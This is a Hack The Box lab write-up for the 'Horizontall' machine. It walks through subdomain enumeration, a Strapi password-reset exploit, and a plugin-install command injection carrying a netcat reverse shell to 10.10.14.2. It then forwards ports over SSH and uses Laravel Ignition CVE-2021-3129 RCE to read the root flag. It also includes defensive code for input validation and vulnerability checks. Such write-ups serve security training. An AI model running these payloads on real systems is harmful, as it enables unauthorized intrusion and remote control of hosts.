HTB - HORIZONTALL


ENUMERATION

MACHINE IP

export IP=10.10.11.105

NMAP SCAN RESULT

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Enumerating/Exploring Web Resources

  • http://10.10.11.105 will redirect to http://horizontall.htb/

  • So add this to /etc/hosts

echo "10.10.11.105 horizontall.htb">> /etc/hosts

  • Nothing useful found on the main web page

  • Trying Directory Bruteforcing

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://10.10.11.105/ -t 100 -x php,txt,js,html,jpg  -q

  • Nothing Useful Found in Directory Bruteforcing

  • This is an nginx server acting as a reverse proxy, and the IP auto-resolved to the horizontall.htb hostname when we first browsed to it, so name-based virtual hosts are likely in use.

  • So we can try subdomain enumeration or brute forcing.

  • Using Gobuster for subdomain Bruteforcing

gobuster dns -d horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
  • Found an interesting subdomain:

Found: api-prod.horizontall.htb

  • Add this subdomain to /etc/hosts

echo "10.10.11.105 api-prod.horizontall.htb">> /etc/hosts

  • Nothing interesting found on the subdomain itself

  • Trying further directory brute forcing on this subdomain using gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://api-prod.horizontall.htb/ -t 100 -x php,txt,js,html,jpg  -q


  • Found interesting directories:
/index.html           (Status: 200) [Size: 413]
/reviews              (Status: 200) [Size: 507]
/users                (Status: 403) [Size: 60] 
/admin                (Status: 200) [Size: 854]
/Reviews              (Status: 200) [Size: 507]
/robots.txt           (Status: 200) [Size: 121]
/Admin                (Status: 200) [Size: 854]
/REVIEWS              (Status: 200) [Size: 507]

  • Checking the directories manually

  • /reviews (and /Reviews) returns user reviews, including the usernames, without authentication:

[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]
  • Users

wail - id=1
doe - id=2
john - id=3

  • /users gave 403 (Forbidden)

  • /robots.txt contains nothing of interest

  • Found one more endpoint using Burp active scanning:

/users-permissions/init
  • Response from this endpoint:

{"hasAdmin":true}

  • So we can infer that an admin account has already been created on this panel.

Getting Reverse Shell

  • Further research shows that this Strapi admin panel is vulnerable to an unauthenticated password reset:
https://www.exploit-db.com/exploits/50239

  • We can download this exploit and run it; it resets the admin password and prints the new password together with a JWT.

  • That JWT is used as the Bearer token in the request below to get a reverse shell.
curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMxMTY0NjMyLCJleHAiOjE2MzM3NTY2MzJ9.cuZYWzy1Y7hk-ajhlHExSWxDVGbJqkWXmuhxUZzSzG8' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f)\",\"port\":\"80\"}' $'http://api-prod.horizontall.htb/admin/plugins/install'

  • For more details about this vulnerability, check out this blog post:
https://bittherapy.net/post/strapi-framework-remote-code-execution/
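The request above works because the plugin name from the JSON body reaches a shell command string, so the `&& $(...)` part runs as its own command. The following is an added example (my own code, not the page's and not Strapi's source) showing the vulnerable string-interpolation pattern next to a hardened version that validates the name against an allowlist and builds an argv list instead of a shell string; the plugin-name pattern and the `npm install strapi-plugin-<name>` shape are assumptions for illustration.

```python
import re

# Assumed allowlist for a plugin name: lowercase letters, digits and hyphens.
# This pattern is an illustration, not taken from Strapi's source.
PLUGIN_NAME = re.compile(r"^[a-z0-9][a-z0-9-]{0,63}$")


def unsafe_install_command(plugin: str) -> str:
    """Vulnerable pattern: the user-supplied name is interpolated into a string
    that is later handed to a shell, so metacharacters in the name become
    separate commands.  Shown for contrast only; it is never executed here."""
    return f"npm install strapi-plugin-{plugin}"


def is_valid_plugin_name(plugin: str) -> bool:
    """Allowlist check: anything outside [a-z0-9-] is rejected outright."""
    return PLUGIN_NAME.fullmatch(plugin) is not None


def safe_install_argv(plugin: str) -> list:
    """Hardened pattern: validate first, then build an argv list suitable for
    subprocess.run(argv, shell=False), so no shell ever parses the name."""
    if not is_valid_plugin_name(plugin):
        raise ValueError(f"rejected plugin name: {plugin!r}")
    return ["npm", "install", f"strapi-plugin-{plugin}"]


def shell_metachars_present(value: str) -> bool:
    """Cheap detection heuristic for inspecting JSON request bodies at a proxy
    or WAF: flags values containing characters that only make sense if a shell
    is going to parse them."""
    return any(ch in value for ch in "&|;$`()<>\n")


# Constructed inputs: a normal plugin name and the shape of the injected value
# from the request above, with the command body replaced by a harmless `id`.
BENIGN = "documentation"
INJECTED = "documentation && $(id)"


if __name__ == "__main__":
    for name in (BENIGN, INJECTED):
        print("unsafe string :", unsafe_install_command(name))
        print("metachars     :", shell_metachars_present(name))
        try:
            print("safe argv     :", safe_install_argv(name))
        except ValueError as exc:
            print("safe argv     :", exc)
```

The allowlist is the real fix; `shell_metachars_present` is only a detection aid for logging or alerting on suspicious request bodies, since an nginx access log does not record POST bodies and would not show this payload.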

  • We should now have a reverse shell.

  • The user flag is at /home/developer/user.txt


PRIVILEGE ESCALATION

  • Running linpeas.sh

  • It reports some listening ports, several of them bound to localhost only:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1856/node /usr/bin/ 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -        
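The listeners bound to 127.0.0.1 (8000, 3306, 1337) are the ones not visible from outside and therefore the ones worth forwarding later. As an added example (my own code, not from the page or linpeas), here is a small parser for this `netstat -tunlp` style output that separates loopback-only listeners from externally exposed ones and derives the matching `ssh -L` flags; the sample text is copied from the output above.

```python
from dataclasses import dataclass
from typing import List, Optional

# Listener lines copied from the linpeas "Active Ports" output above.
NETSTAT_OUTPUT = """\
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1856/node /usr/bin/
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""


@dataclass
class Listener:
    proto: str
    addr: str
    port: int
    pid: Optional[int]       # None when netstat prints "-" (no permission to see it)
    program: Optional[str]   # process name after "pid/", if shown


def is_loopback(addr: str) -> bool:
    """127.0.0.0/8 or ::1 means the service is reachable only from the host."""
    return addr == "::1" or addr.startswith("127.")


def parse_listeners(text: str) -> List[Listener]:
    """Parse LISTEN rows of netstat -tunlp output into Listener records."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[5] != "LISTEN":
            continue
        # Local address is "addr:port"; IPv6 wildcards look like ":::80".
        addr, port = fields[3].rsplit(":", 1)
        pid: Optional[int] = None
        program: Optional[str] = None
        if len(fields) > 6 and fields[6] != "-":
            pid_str, _, program = fields[6].partition("/")
            pid = int(pid_str)
        listeners.append(Listener(fields[0], addr, int(port), pid, program))
    return listeners


def local_only(listeners: List[Listener]) -> List[Listener]:
    """Services that an external scan (like the nmap result above) cannot see."""
    return [l for l in listeners if is_loopback(l.addr)]


def ssh_forward_flags(listeners: List[Listener]) -> List[str]:
    """Build one -L flag per loopback-only port, mirroring the
    'ssh -L 8000:localhost:8000' form used in the port-forwarding step."""
    ports = sorted({l.port for l in local_only(listeners)})
    return [f"-L {p}:localhost:{p}" for p in ports]


if __name__ == "__main__":
    found = parse_listeners(NETSTAT_OUTPUT)
    for l in found:
        scope = "localhost only" if is_loopback(l.addr) else "exposed"
        print(f"{l.proto:5} {l.addr}:{l.port:<6} {scope:15} {l.program or '?'}")
    print("ssh", " ".join(ssh_forward_flags(found)))
```

Exposed ports 80 and 22 match the nmap scan, while 8000, 3306 and 1337 only show up from inside the host, which is why the SSH tunnel in the next section is needed to reach the Laravel instance.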

  • Port 8000 on localhost serves a web application; fetch it from the target shell:
curl 0.0.0.0:8000 > index.html

  • The saved page shows Laravel v8 running on PHP v7.4.18.

  • This Laravel setup is vulnerable to RCE via CVE-2021-3129 (the Ignition debug-mode bug).

  • Further research turned up this GitHub repo with an exploit for the vulnerability:

https://github.com/ambionics/laravel-exploits
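From the defender's side, CVE-2021-3129 needs two things at once: a facade/ignition version below 2.5.2 and APP_DEBUG=true in a deployed app. As an added example (my own code, not from the page or the exploit repo), here is a check that reads a composer.lock and a .env file and reports which of the two conditions hold; the sample lock and env contents are constructed for illustration, not taken from the box.

```python
import json
import re
from typing import Optional, Tuple

# CVE-2021-3129 is fixed in facade/ignition 2.5.2.
FIXED_IGNITION: Tuple[int, ...] = (2, 5, 2)

# Constructed composer.lock excerpt (not the target's real file); only the
# fields the check reads are present.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v8.4.0"},
        {"name": "facade/ignition", "version": "2.5.1"},
    ],
    "packages-dev": [],
})

# Constructed .env excerpt with the risky setting enabled.
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=local\nAPP_DEBUG=true\nAPP_URL=http://localhost\n"


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn 'v8.4.0' or '2.5.1' into a comparable tuple of ints."""
    return tuple(int(n) for n in re.findall(r"\d+", version)[:3])


def ignition_version(lock_text: str) -> Optional[str]:
    """Return the locked facade/ignition version, or None if not installed."""
    data = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in data.get(section, []):
            if pkg.get("name") == "facade/ignition":
                return pkg.get("version")
    return None


def ignition_vulnerable(lock_text: str) -> bool:
    """True when the locked Ignition version predates the 2.5.2 fix."""
    version = ignition_version(lock_text)
    return version is not None and parse_version(version) < FIXED_IGNITION


def debug_enabled(env_text: str) -> bool:
    """True when APP_DEBUG=true is set in the .env content."""
    for line in env_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "APP_DEBUG":
            return value.strip().strip("\"'").lower() == "true"
    return False


def assess(lock_text: str, env_text: str) -> str:
    """Combine both conditions into a one-line verdict."""
    vulnerable = ignition_vulnerable(lock_text)
    debug = debug_enabled(env_text)
    if vulnerable and debug:
        return "exploitable: Ignition < 2.5.2 and APP_DEBUG=true"
    if vulnerable:
        return "patch needed: Ignition < 2.5.2 (debug currently off)"
    if debug:
        return "hardening: APP_DEBUG=true should be false outside development"
    return "ok"


if __name__ == "__main__":
    print("ignition:", ignition_version(SAMPLE_COMPOSER_LOCK))
    print("verdict :", assess(SAMPLE_COMPOSER_LOCK, SAMPLE_ENV))
```

Either fix on its own closes the hole: upgrading facade/ignition to 2.5.2 or later, or turning APP_DEBUG off; doing both is the normal remediation for a box like this one.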

Port Forwarding using SSH

  • Port 8000 is bound to localhost on the user machine only, so we need to make it reachable from our attacker machine.

  • We can use SSH port forwarding for that.


  • STEPS FOR PORT FORWARDING
  1. Create an SSH key pair: ssh-keygen -t rsa

  2. Put the public key on the user (compromised) machine in /opt/strapi/.ssh/authorized_keys. Note that authorized_keys is a file containing the public key, not a directory.

  3. Use the private key from the attacker machine to connect back to the user machine and set up a local forward to port 8000:

ssh -L 8000:localhost:8000 [email protected] -i keypair

  • (Here keypair is the private key generated earlier)
  4. After a successful connection, browse port 8000 from your own machine with curl 0.0.0.0:8000. If the Laravel page comes back, the port forwarding is working and we can use the exploit.

  • Now we can use the RCE to get the root flag. Follow the instructions in the GitHub repo; its README example runs id through the forwarded port:
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id 
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared


  • Let's modify the payload to read the root flag instead.
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt" 

./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
  • Output:
python3 laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar                                                  
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d31c599c35924f3afdd3447c96c8ea65
--------------------------
+ Logs cleared

  • We should now have the root flag.


<3 Horizontall Has Been Pwned!